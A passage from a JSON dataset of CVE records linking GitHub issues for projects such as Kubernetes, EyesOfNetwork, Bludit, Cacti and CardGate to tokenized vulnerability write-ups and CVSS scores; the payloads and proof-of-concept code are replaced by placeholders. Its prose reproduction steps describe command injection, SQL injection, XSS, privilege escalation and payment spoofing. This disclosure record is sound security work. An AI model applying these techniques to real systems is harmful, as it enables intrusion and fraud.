        "description": "CVETAG : Docker config secrets leaked when file is malformed and log level NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using a logging level of at least NUMBERTAG processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. Am I vulnerable? If APITAG type secrets are used, and a log level of NUMBERTAG or higher is used. Third party tools using PATHTAG to read docker config files may also be vulnerable. Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Nikolaos Moraitis APITAG Hat) /area security /kind bug /committee product security",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8565",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95623",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95623",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-10-15T22:05:32Z",
        "description": "CVETAG : Incomplete fix for CVETAG allows for token leak in logs when APITAG NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes, if the logging level is to at least NUMBERTAG authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl . Am I vulnerable? If kube apiserver is using a log level of at least NUMBERTAG Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG alpha2 To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Patrick Rhomberg (purelyapplied) /area security /kind bug /committee product security",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8566",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95624",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95624",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-10-15T22:07:53Z",
        "description": "CVETAG : Ceph RBD APITAG exposed in logs when loglevel NUMBERTAG CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using Ceph RBD as a storage provisioner, with logging level of at least NUMBERTAG Ceph RBD admin secrets can be written to logs. This occurs in kube controller manager's logs during provisioning of Ceph RBD persistent claims. Am I vulnerable? If Ceph RBD volumes are in use and kube controller manager is using a log level of at least NUMBERTAG Affected Versions kubernetes NUMBERTAG kubernetes NUMBERTAG kubernetes NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek NUMBERTAG area security /kind bug /committee product security",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8567",
        "Issue_Url_old": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
        "Issue_Url_new": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
        "Repo_new": "kubernetes-sigs/secrets-store-csi-driver",
        "Issue_Created_At": "2020-11-16T17:36:27Z",
        "description": "CVETAG : Plugin directory traversals. CVSS Rating: Medium NUMBERTAG PATHTAG URLTAG Specially crafted APITAG can write to arbitrary file paths on the host filesystem, including APITAG . Am I vulnerable? All supported plugins included this bug. Affected Versions Vault Plugin NUMBERTAG Azure Plugin NUMBERTAG GCP Plugin NUMBERTAG How do I mitigate this vulnerability? Update all plugins to versions that include fixes. Fixed Versions Vault Plugin NUMBERTAG fixed by NUMBERTAG URLTAG Azure Plugin NUMBERTAG fixed by NUMBERTAG URLTAG GCP Plugin NUMBERTAG fixed by NUMBERTAG URLTAG Detection APITAG with APITAG , APITAG or APITAG that includes APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8568",
        "Issue_Url_old": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
        "Issue_Url_new": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
        "Repo_new": "kubernetes-sigs/secrets-store-csi-driver",
        "Issue_Created_At": "2020-11-10T23:10:13Z",
        "description": "CVETAG : Secrets sync/rotate directory traversal. CVSS Rating: Medium NUMBERTAG PATHTAG URLTAG Modification of APITAG resource could result in writing content to the host filesystem and syncing file contents to Kubernetes Secrets. This includes paths under APITAG that contain other Kubernetes Secrets. Am I vulnerable? The attacker must have permissions to update or patch the APITAG resources which is not granted by default and the auto rotations feature must be enabled which is also not enabled by default. Affected Versions NUMBERTAG How do I mitigate this vulnerability? Do not grant users or workloads permissions to modify APITAG resources. Upgrade the driver to NUMBERTAG or above which include additional verifications on the APITAG field. Fixed Versions NUMBERTAG fixed by NUMBERTAG URLTAG Detection N/A",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-8569",
        "Issue_Url_old": "https://github.com/kubernetes-csi/external-snapshotter/issues/380",
        "Issue_Url_new": "https://github.com/kubernetes-csi/external-snapshotter/issues/380",
        "Repo_new": "kubernetes-csi/external-snapshotter",
        "Issue_Created_At": "2020-09-29T13:00:51Z",
        "description": "snapshot controller panics when source PVC does not exist. When taking a snapshot of a non existing PVC, snapshot controller panics: ERRORTAG To reproduce this, the APITAG must not have a APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8570",
        "Issue_Url_old": "https://github.com/kubernetes-client/java/issues/1491",
        "Issue_Url_new": "https://github.com/kubernetes-client/java/issues/1491",
        "Repo_new": "kubernetes-client/java",
        "Issue_Created_At": "2021-01-11T23:09:47Z",
        "description": "CVETAG : Path Traversal bug in the Java Kubernetes Client. There is a defect in the copy implementation in APITAG that was fixed in NUMBERTAG The summary of the issue is that you copy a file from a malicious pod with a specially crafted tarball, it may extract to any file that your user has permission to write. This issue was fixed in release APITAG , APITAG and APITAG users are strongly encouraged to upgrade to those versions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8645",
        "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/9",
        "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/9",
        "Repo_new": "niteosoft/simplejobscript",
        "Issue_Created_At": "2020-01-19T13:01:39Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8654",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/50",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/50",
        "Repo_new": "eyesofnetworkcommunity/eonweb",
        "Issue_Created_At": "2020-02-05T13:27:51Z",
        "description": "Execution de commandes arbitraires sur le module APITAG Bonjour, Il est possible d\u2019ex\u00e9cuter des commandes arbitraires sur le syst\u00e8me d'exploitation pour un utilisateur d'EON ayant les droits suffisant pour utiliser le module APITAG Le champ APITAG n'est pas filtr\u00e9 est il est possible d\u2019ex\u00e9cuter des commandes arbitraires. Voici un exemple de valeur de Target \u00e9x\u00e9cutant la command id sur le syst\u00e8me: APITAG R\u00e9sultat obtenu: FILETAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8655",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonconf/issues/8",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonconf/issues/8",
        "Repo_new": "eyesofnetworkcommunity/eonconf",
        "Issue_Created_At": "2020-02-05T13:40:03Z",
        "description": "Elevation de privil\u00e8ges possible depuis l'utilisateur apache.. Bonjour, Il est possible pour l'utilisateur apache d\u2019ex\u00e9cuter des commandes arbitraires en tant que l'utilisateur root. Voici la configuration par d\u00e9faut pr\u00e9sente pour l'utilisateur apache sur EON NUMBERTAG CODETAG Un utilisateur peut utiliser la commande nmap pour ex\u00e9cuter des commandes arbitraires en tant que 'root' en utilisant un script NSE sp\u00e9cialement con\u00e7u. Preuve de concept: FILETAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8656",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/16",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonapi/issues/16",
        "Repo_new": "eyesofnetworkcommunity/eonapi",
        "Issue_Created_At": "2020-02-05T13:20:52Z",
        "description": "Injection SQL sur le champ username de APITAG Bonjour, Il est possible de r\u00e9aliser une injection SQL sur le champ username de la fonction APITAG Exemple d'injection de code utilisant la fonction sleep NUMBERTAG ERRORTAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel. La version report\u00e9e de l'API est la NUMBERTAG avec l'installation de EON.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8657",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/17",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonapi/issues/17",
        "Repo_new": "eyesofnetworkcommunity/eonapi",
        "Issue_Created_At": "2020-02-05T14:03:19Z",
        "description": "Cl\u00e9s d'API pr\u00e9dictible/bruteforcable. Bonjour, Il a \u00e9t\u00e9 observ\u00e9 que la cl\u00e9s d'API par d\u00e9faut d'une installation de EON NUMBERTAG reste inchang\u00e9 apr\u00e8s une installation ( APITAG ) et cet \u00e9l\u00e9ment de configuration ne semble pas accessible dans l'interface d\u2019administration WEB. Le calcul du token d'API d'un utilisateur est bas\u00e9e sur la cl\u00e9s, son ID ainsi que de l'IP du serveur. L'ID du compte admin est NUMBERTAG et l'adresse IP du serveur est connu (sauf si NAT en place). CODETAG Il devient alors trivial de calculer le token du compte admin. Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel. La version report\u00e9e de l'API est la NUMBERTAG avec l'installation de EON.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8788",
        "Issue_Url_old": "https://github.com/ClearCanvas/ClearCanvas/issues/227",
        "Issue_Url_new": "https://github.com/clearcanvas/clearcanvas/issues/227",
        "Repo_new": "clearcanvas/clearcanvas",
        "Issue_Created_At": "2019-07-24T21:37:53Z",
        "description": "Cross site Scripting (XSS) and HTML Injection on APITAG APITAG NUMBERTAG Alpha. Hello, I found two vulnerabilities that affect to APITAG APITAG NUMBERTAG Alpha: Cross site Scripting (XSS) reflected HTML Injection You can reproduce both with the following details NUMBERTAG Payload: APITAG xss NUMBERTAG ulnerable POST data: APITAG APITAG xss NUMBERTAG Output: APITAG A potentially dangerous APITAG value was detected from the client APITAG APITAG ...\"). APITAG NUMBERTAG Step NUMBERTAG Open PATHTAG or PATHTAG URL login page according your config deployments NUMBERTAG Step NUMBERTAG Fill the username and password inputs with XSS/HTML payload and submit the login form NUMBERTAG Step NUMBERTAG Then, you will have a XSS/HTML injections clicking on payload. FILETAG FILETAG If you need reproduce, fix the issue, or more details about that, please, feel free to ping me URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8811",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1131",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1131",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-02-05T04:06:25Z",
        "description": "Security Arbitrary Change Profile Picture. Describe This vulnerability allows authenticated users to change other user's profile pictures. Steps to reproduce the vulnerability NUMBERTAG Tried to login via Administrator privilege. We found NUMBERTAG accounts. \ufeff FILETAG Moreover, we can access directly to Profile Pictures like this _ URLTAG FILETAG FILETAG FILETAG NUMBERTAG Tried to login via limit privilege (username: admon2, role: Editor). FILETAG From a HTTP Request to perform to change a user picture. FILETAG We could change the username to another username. FILETAG As a result, we could change to the profile picture of another user. FILETAG FILETAG Login with Administrator to verify the change via username \u201cadmin\u201d and found a profile picture has changed. FILETAG In addition, we could arbitrarily create a picture (png) to other directories. FILETAG FILETAG Comments The vulnerability doesn't validate an authorization before the upload process. Moreover, it could be pulled username from trusted source Bludit version Affected in Bludit NUMBERTAG PHP version PHP Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8812",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1132",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1132",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-02-05T04:14:38Z",
        "description": "Security Stored Cross Site Script. Describe This vulnerability allows Editor or Author roles could insert malicious APITAG on the WYSIWYG editor. Steps to reproduce the vulnerability Affected in Bludit NUMBERTAG Tried to login with username \u201cadmon2\u201d, who is an Editor. Then, pressed the button. FILETAG FILETAG We inserted a simple APITAG for APITAG FILETAG As a result, we could insert malicious APITAG on the WYSIWYG editor. FILETAG But the CMS had inserted APITAG when web applications issued a token to web browser, resulting in the attacker couldn\u2019t steal the cookie. FILETAG But the attacker still crafted malicious APITAG to do anything. I.e. enforce every legitimate user to logout on the web application FILETAG As a result, we could enforce legitimated users to logout. FILETAG Bludit version Affected in Bludit NUMBERTAG PHP version PHP Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-8813",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3285",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3285",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-02-23T06:03:06Z",
        "description": "When guest users have access to realtime graphs, remote code could be executed ( CVETAG ). Describe the bug Mohammad Askar of APITAG has reported that FILETAG prior to NUMBERTAG allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie if a guest user has the graph real time privilege. To Reproduce Steps to reproduce the behavior NUMBERTAG Enable the guest account NUMBERTAG Ensure the guest account has full access to realtime graphs NUMBERTAG Change the APITAG cookie to have malformed characters which could run a script. Expected behavior The raw output of the cookie should be treated as insecure and as such, a validated version of the value utilised. Additional context This was reported as CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8818",
        "Issue_Url_old": "https://github.com/cardgate/magento2/issues/54",
        "Issue_Url_new": "https://github.com/cardgate/magento2/issues/54",
        "Repo_new": "cardgate/magento2",
        "Issue_Created_At": "2020-02-24T18:42:21Z",
        "description": "Public disclosure on CVETAG Unauthorized Payments Hijacking + Order Status Spoofing]. [ CVETAG CVETAG Lack of origin authentication ( CVETAG CVETAG at IPN callback processing function allow ( even _unauthorized_ ) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: Magento NUMBERTAG FILETAG APITAG of Concept APITAG APITAG ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8819",
        "Issue_Url_old": "https://github.com/cardgate/woocommerce/issues/18",
        "Issue_Url_new": "https://github.com/cardgate/woocommerce/issues/18",
        "Repo_new": "cardgate/woocommerce",
        "Issue_Created_At": "2020-02-24T18:40:59Z",
        "description": "Public disclosure on CVETAG Unauthorized Payments Hijacking + Order Status Spoofing]. [ CVETAG CVETAG Lack of origin authentication ( CVETAG CVETAG at IPN callback processing function allow ( even _unauthorized_ ) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: APITAG NUMBERTAG APITAG NUMBERTAG FILETAG APITAG of Concept APITAG APITAG ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8823",
        "Issue_Url_old": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1",
        "Issue_Url_new": "https://github.com/theyiyibest/reflected-xss-on-sockjs/issues/1",
        "Repo_new": "theyiyibest/reflected-xss-on-sockjs",
        "Issue_Created_At": "2020-02-14T14:57:10Z",
        "description": "Affected version and product name accurate?. I'm concerned the public text of CVETAG isn't well defined enough for development teams to patch the affected library. Can you provide more details to help? Specifically the concern is that product name and version number do not match clearly with APITAG APITAG seems to be a product family and not a single product. The entire product family does not look to be affected, and the issue seems to reside in sockjs node. Is this correct? The version number is also confusing, as sockjs node is currently listed as being NUMBERTAG Was the library released on another platform as version NUMBERTAG It would be appreciated if you can help update the CVE text to be more clear about what is affected. I assume this has been reported to the authors of APITAG They may be able to help pinpoint exactly what needs to be updated in the wording",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8840",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2620",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2620",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-02-09T22:50:59Z",
        "description": "Block one more gadget type (xbean reflect/JNDI CVE NUMBERTAG NOTE: a placeholder until complete information gathered] Another gadget ( ) type reported related to JNDI access. See URLTAG for description of the general problem. Mitre id: TO BE ALLOCATED Original discoverer: threedr3am Fixed in NUMBERTAG most likely) does not affect NUMBERTAG and later",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8908",
        "Issue_Url_old": "https://github.com/google/guava/issues/4011",
        "Issue_Url_new": "https://github.com/google/guava/issues/4011",
        "Repo_new": "google/guava",
        "Issue_Created_At": "2020-09-08T22:13:01Z",
        "description": "APITAG local information disclosure vulnerability. Since the fix for this vulnerability is now disclosed by this commit ( URLTAG and it was closed internally by google as APITAG Functionality' I figure I'll disclose the vulnerability fully. Vulnerability CODETAG On the flip side, when using APITAG , this creates a directory with the correct file permissions. CODETAG Impact The impact of this vulnerability is that, the file permissions on the file created by APITAG allows an attacker running a malicious program co resident on the same machine can steal secrets stored in this directory. This is because by default on unix like operating systems the APITAG directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system. Resolution The resolution by the Google team was the following: > The team decided to document the behavior, as well as deprecate the method as other alternatives exist. This completely makes sense to me, and I think is appropriate. The open question that exists in my mind is whether or not this issue warrants a CVE number issued.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8927",
        "Issue_Url_old": "https://github.com/bitemyapp/brotli2-rs/issues/45",
        "Issue_Url_new": "https://github.com/bitemyapp/brotli2-rs/issues/45",
        "Repo_new": "bitemyapp/brotli2-rs",
        "Issue_Created_At": "2021-12-20T21:10:45Z",
        "description": "Packaged version of brotli is affected by CVETAG . Brotli versions prior NUMBERTAG are affected by CVETAG . URLTAG This is an integer overflow and I believe it is reachable from the rust bindings, but that's just based on a quick perusal of the source code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8927",
        "Issue_Url_old": "https://github.com/github/advisory-database/issues/785",
        "Issue_Url_new": "https://github.com/github/advisory-database/issues/785",
        "Repo_new": "github/advisory-database",
        "Issue_Created_At": "2022-10-31T20:04:11Z",
        "description": "Update impacted packages for CVETAG . Hi, This list of impacted packages is based on input from the .NET team. //cc MENTIONTAG MENTIONTAG MENTIONTAG , I would have used the Advisory update UX to update URLTAG but this list is just so long \ud83d\ude06 CVE | Announcement date | CVE URL | Announcement URL | APITAG Advisory | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | CVETAG | PATHTAG | URLTAG | URLTAG | URLTAG | APITAG arm | APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8981",
        "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/338",
        "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/338",
        "Repo_new": "mantisbt-plugins/source-integration",
        "Issue_Created_At": "2020-02-13T13:33:38Z",
        "description": "XSS in Delete Repository page. This is related to NUMBERTAG Steps to reproduce NUMBERTAG Create a new repository, set repo name to APITAG NUMBERTAG Update and go back to Manage Repository page NUMBERTAG Click on APITAG Repository_ CVE request pending.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-9272",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/902",
        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/902",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2020-02-18T17:15:00Z",
        "description": "Out of bound read in getstateflags function. This vulnerability was previously reported via email to EMAILTAG rg and has been made public after the fix has been developed. Credit This issue was discovered and reported by APITAG Security Lab team member MENTIONTAG APITAG Morales). Summary: An out of bounds (OOB) read vulnerability has been detected in mod_cap. Description: The APITAG function on \"cap_text.c\" does a call to getstateflags(caps, n) [line NUMBERTAG When getstateflags(cap_t caps, int capno) is called, \"capno\" is equal to NUMBERTAG so \"isset_cap((__cap_s )(&caps APITAG will be expanded to \"&((__cap_s )(&caps APITAG >_blk NUMBERTAG accesing caps APITAG that is outside of \"caps\" struct bounds NUMBERTAG ae4 to NUMBERTAG af7 in our example) APITAG As a result, OOB reads occurs resulting in accessing a memory location that is outside of the boundaries of the caps struct variable. This bug doesn't affect neither APITAG nor APITAG This is because in these cases \"permited\" and \"inheritable\" members are located just after them APITAG Please let me know when you have fixed the bugs so that I can coordinate my disclosure with yours. For reference, here is a link to APITAG vulnerability disclosure policy: URLTAG Thank you, 